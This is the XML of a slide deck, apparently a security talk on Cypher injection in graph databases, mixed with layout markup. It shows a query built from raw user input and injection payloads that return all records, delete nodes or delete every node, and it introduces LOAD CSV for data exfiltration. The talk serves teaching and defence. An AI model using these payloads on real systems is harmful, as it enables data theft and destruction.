            <a:off x="323125" y="1463825"/>
            <a:ext cx="53364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highlight>
                  <a:srgbClr val="E06666"/>
                </a:highlight>
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:rPr>
              <a:t>Spongebob -&gt; Spongebob” OR 1=1</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2100">
                <a:highlight>
                  <a:srgbClr val="E06666"/>
                </a:highlight>
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:rPr>
              <a:t>--</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2200">
              <a:highlight>
                <a:srgbClr val="E06666"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3338" name="Google Shape;3338;p46"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="223950" y="2124325"/>
            <a:ext cx="89547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SELECT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lang="en" sz="22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FROM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“characters” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="22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name = 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en" sz="1900">
                <a:highlight>
                  <a:srgbClr val="E06666"/>
                </a:highlight>
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:rPr>
              <a:t>Spongebob” OR 1=1--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9" name="Google Shape;33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11925"/>
            <a:ext cx="999438" cy="8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0" name="Google Shape;3340;p46"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="1996063">
            <a:off x="-87198" y="4152491"/>
            <a:ext cx="2505871" cy="461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b="1" i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Iniciando el hackeo</a:t>
            </a:r>
            <a:endParaRPr b="1" i="1" sz="18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1" name="Google Shape;334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47"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1449650" y="900250"/>
            <a:ext cx="71331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7" name="Google Shape;3347;p47"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="784150"/>
            <a:ext cx="9144000" cy="15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Cypher Injection</a:t>
            </a:r>
            <a:endParaRPr sz="7200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3348" name="Google Shape;3348;p47"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1024600" y="2013797"/>
            <a:ext cx="70104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Returning back to </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="4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Cypher</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="4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49" name="Google Shape;33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71525"/>
            <a:ext cx="2300700" cy="1714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0" name="Google Shape;3350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4" name="Shape 3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5" name="Google Shape;3355;p48"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="370200" y="828225"/>
            <a:ext cx="7757400" cy="264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48"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="303900" y="885250"/>
            <a:ext cx="8840100" cy="23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 c.name = ' + </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="26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USER_INPUT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 + ' </a:t>
            </a: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7" name="Google Shape;3357;p48"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="720000" y="3895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MATCH</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> By Name</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3358" name="Google Shape;3358;p48"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="303900" y="2599575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c.name = </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill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b="1" lang="en" sz="2600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill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Spongebob</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2600">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill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b="1" lang="en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9" name="Google Shape;3359;p48"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="303900" y="20453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Spongebob</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2600">
              <a:highlight>
                <a:srgbClr val="6AA84F"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3360" name="Google Shape;336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450" y="3856150"/>
            <a:ext cx="1126575" cy="10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1" name="Google Shape;3361;p48"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3776450" y="3705375"/>
            <a:ext cx="1342200" cy="13032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62" name="Google Shape;336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49"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="209925" y="810975"/>
            <a:ext cx="6580500" cy="2792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8" name="Google Shape;3368;p49"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2552371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69" name="Google Shape;3369;p49"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="4294967295" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="415200" y="810975"/>
            <a:ext cx="77040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c.name = ' + </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="24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USER_INPUT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+ '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0" name="Google Shape;3370;p49"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5458572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71" name="Google Shape;3371;p49"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="6" type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="8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MATCH</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3200"/>
              <a:t> By Name Injection - Return All</a:t>
            </a:r>
            <a:endParaRPr sz="3200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3372" name="Google Shape;3372;p49"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="415200" y="2418400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c.name =’</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2400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Spongebob’ OR 1=1 RETURN c//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3" name="Google Shape;3373;p49"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="415200" y="1772225"/>
            <a:ext cx="52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Spongebob’ OR 1=1 RETURN c//</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2400">
              <a:highlight>
                <a:srgbClr val="FF6B65"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3374" name="Google Shape;3374;p49"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1071300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375" name="Google Shape;3375;p49"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4033227" y="3853221"/>
            <a:ext cx="1225563" cy="1189952"/>
            <a:chOff x="3776450" y="3705375"/>
            <a:chExt cx="1342200" cy="1303200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="3376" name="Google Shape;3376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6450" y="3856150"/>
              <a:ext cx="1126575" cy="1001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7" name="Google Shape;3377;p49"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3776450" y="3705375"/>
              <a:ext cx="1342200" cy="13032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378" name="Google Shape;337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935" y="3870155"/>
            <a:ext cx="1156357" cy="1156391"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3379" name="Google Shape;3379;p49"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6847076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80" name="Google Shape;33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9693" y="3870174"/>
            <a:ext cx="1156356" cy="11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1" name="Google Shape;338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5527" y="3850100"/>
            <a:ext cx="1196508" cy="119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2" name="Google Shape;338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5370" y="3850100"/>
            <a:ext cx="1196506" cy="1196498"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3383" name="Google Shape;3383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4" name="Google Shape;3384;p49"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId8">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="4906" t="2856"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="946825" y="639000"/>
            <a:ext cx="6498124" cy="37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32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="452225" y="1214125"/>
            <a:ext cx="636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32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Whoami</a:t>
            </a:r>
            <a:endParaRPr sz="4200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3138" name="Google Shape;3138;p32"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="339000" y="1146375"/>
            <a:ext cx="7704000" cy="33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Security Researcher @ </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="3000"/>
              <a:t>MoonActive</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3000"/>
          </a:p>
          <a:p>
            <a:pPr indent="-412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900"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="3000"/>
              <a:t>AppSec-IL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3000"/>
              <a:t> 2020 CTF Creators Team</a:t>
            </a:r>
            <a:endParaRPr sz="3000"/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b="1" lang="en" sz="3000"/>
              <a:t>Hacker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3000"/>
              <a:t> by title, </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="3000"/>
              <a:t>dancer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3000"/>
              <a:t> by soul</a:t>
            </a:r>
            <a:endParaRPr sz="3000"/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-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3000"/>
              <a:t>Dog owner / </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="3000"/>
              <a:t>dog owns me</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3139" name="Google Shape;3139;p32"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="3392" l="0" r="0" t="3401"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7358175" y="930876"/>
            <a:ext cx="1606500" cy="15438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0" name="Google Shape;3140;p32"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="24974" l="5196" r="18502" t="32537"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6959750" y="2645876"/>
            <a:ext cx="1202100" cy="13896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1" name="Google Shape;314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50"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="415200" y="783450"/>
            <a:ext cx="3974700" cy="114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0" name="Google Shape;3390;p50"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="4294967295" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="415200" y="810975"/>
            <a:ext cx="77040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c.name = ' + </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="24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USER_INPUT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+ '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1" name="Google Shape;3391;p50"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="6" type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="8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MATCH</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3200"/>
              <a:t> By Name Injection - Delete</a:t>
            </a:r>
            <a:endParaRPr sz="3200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3392" name="Google Shape;3392;p50"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="415200" y="2508025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c.name =’</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2400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Spongebob’ DELETE c//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3" name="Google Shape;3393;p50"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="415200" y="1772225"/>
            <a:ext cx="52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Spongebob’ DELETE c//</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2400">
              <a:highlight>
                <a:srgbClr val="FF6B65"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="3394" name="Google Shape;3394;p50"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4021624" y="3680681"/>
            <a:ext cx="1322872" cy="1284434"/>
            <a:chOff x="3776450" y="3705375"/>
            <a:chExt cx="1342200" cy="1303200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="3395" name="Google Shape;3395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6450" y="3856150"/>
              <a:ext cx="1126575" cy="1001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6" name="Google Shape;3396;p50"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3776450" y="3705375"/>
              <a:ext cx="1342200" cy="13032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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="3397" name="Google Shape;3397;p50"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4094840" y="37213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8" name="Google Shape;3398;p50"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="3994889" y="37213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9" name="Google Shape;33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3" name="Shape 3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4" name="Google Shape;3404;p51"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="293650" y="1795325"/>
            <a:ext cx="1889100" cy="934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5" name="Google Shape;3405;p51"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-208750" y="464350"/>
            <a:ext cx="6507300" cy="27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DELETE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EVERYTHING</a:t>
            </a:r>
            <a:endParaRPr sz="6000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3406" name="Google Shape;3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150" y="1118675"/>
            <a:ext cx="3691200" cy="38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7" name="Google Shape;340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2" name="Google Shape;3412;p52"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="366175" y="791525"/>
            <a:ext cx="1458000" cy="922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52"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2552371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14" name="Google Shape;3414;p52"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="4294967295" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="415200" y="810975"/>
            <a:ext cx="77040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c.name = ' + </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="24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USER_INPUT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+ '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5" name="Google Shape;3415;p52"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5458572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16" name="Google Shape;3416;p52"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="6" type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="8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MATCH</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3200"/>
              <a:t> By Name Injection - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3200">
                <a:solidFill>
                  <a:schemeClr val="dk2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DELETE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3200"/>
              <a:t> All</a:t>
            </a:r>
            <a:endParaRPr sz="3200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3417" name="Google Shape;3417;p52"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="415200" y="1740600"/>
            <a:ext cx="914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c.name =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</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2400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Spongebob’ </a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FF6B6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MATCH (all:Character) </a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="FF6B6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DELETE all</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="2400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//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 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8" name="Google Shape;3418;p52"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1071300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19" name="Google Shape;3419;p52"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4033227" y="3853221"/>
            <a:ext cx="1225563" cy="1189952"/>
            <a:chOff x="3776450" y="3705375"/>
            <a:chExt cx="1342200" cy="1303200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="3420" name="Google Shape;3420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76450" y="3856150"/>
              <a:ext cx="1126575" cy="1001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1" name="Google Shape;3421;p52"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3776450" y="3705375"/>
              <a:ext cx="1342200" cy="13032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pic>
        <p:nvPicPr>
          <p:cNvPr id="3422" name="Google Shape;34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5935" y="3870155"/>
            <a:ext cx="1156357" cy="1156391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p52"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6847076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24" name="Google Shape;342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9693" y="3870174"/>
            <a:ext cx="1156356" cy="11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5527" y="3850100"/>
            <a:ext cx="1196508" cy="119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6" name="Google Shape;342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5370" y="3850100"/>
            <a:ext cx="1196506" cy="1196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7" name="Google Shape;3427;p52"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4094840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8" name="Google Shape;3428;p52"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="3994889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9" name="Google Shape;3429;p52"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5542640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0" name="Google Shape;3430;p52"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="5442689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1" name="Google Shape;3431;p52"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6990440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2" name="Google Shape;3432;p52"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="6890489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3" name="Google Shape;3433;p52"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2647040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4" name="Google Shape;3434;p52"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="2547089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5" name="Google Shape;3435;p52"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1123040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6" name="Google Shape;3436;p52"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="1023089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7" name="Google Shape;343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p53"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3967800" y="2150638"/>
            <a:ext cx="5176200" cy="20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4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b="1" lang="en" sz="4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Character</a:t>
            </a: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4400">
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:rPr>
              <a:t>label</a:t>
            </a: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4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3" name="Google Shape;3443;p53"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="363725"/>
            <a:ext cx="9144000" cy="12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BuT We </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="4800">
                <a:solidFill>
                  <a:srgbClr val="073763"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DoN’t SeE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="4800"/>
              <a:t> ThE QuErY!</a:t>
            </a:r>
            <a:endParaRPr sz="4800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3444" name="Google Shape;3444;p53"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="10762" l="8688" r="2831" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1269925"/>
            <a:ext cx="5276999" cy="38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5" name="Google Shape;3445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6" name="Google Shape;344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800" y="1017050"/>
            <a:ext cx="2353200" cy="13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0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54"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1461725" y="638450"/>
            <a:ext cx="6363900" cy="356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2" name="Google Shape;3452;p54"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="407250" y="701200"/>
            <a:ext cx="8329500" cy="17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Data Exfiltration</a:t>
            </a:r>
            <a:endParaRPr sz="7200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3453" name="Google Shape;3453;p54"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228000" y="2742700"/>
            <a:ext cx="868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Leveraging </a:t>
            </a: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LOAD</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="4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CSV</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="4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b="1" lang="en" sz="4200">
                <a:solidFill>
                  <a:srgbClr val="1155CC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endParaRPr b="1" sz="4800">
              <a:solidFill>
                <a:srgbClr val="1155CC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454" name="Google Shape;345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5" name="Google Shape;34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549" y="3513323"/>
            <a:ext cx="1684776" cy="6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6" name="Google Shape;3456;p54"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2526950" y="3413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i</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="42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0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p55"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="261400" y="1170125"/>
            <a:ext cx="71574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2" name="Google Shape;3462;p55"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="321825" y="1117625"/>
            <a:ext cx="8470200" cy="8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800"/>
              <a:t>import </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="1" lang="en" sz="3800"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i="1" lang="en" sz="3800"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="1" lang="en" sz="3800"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i="1" lang="en" sz="3800"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" i="1" lang="en" sz="3800">
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:rPr>
              <a:t>CSV files.</a:t>
            </a:r>
            <a:endParaRPr b="1" i="1"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3" name="Google Shape;3463;p55"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2526425" y="-33775"/>
            <a:ext cx="3969300" cy="115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LOAD CSV</a:t>
            </a:r>
            <a:endParaRPr sz="4000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3464" name="Google Shape;3464;p55"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="169425" y="1852575"/>
            <a:ext cx="9040800" cy="15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LOAD CSV FROM</a:t>
            </a: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 https://your-website/data.csv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5" name="Google Shape;3465;p55"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="3381" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="321825" y="2936175"/>
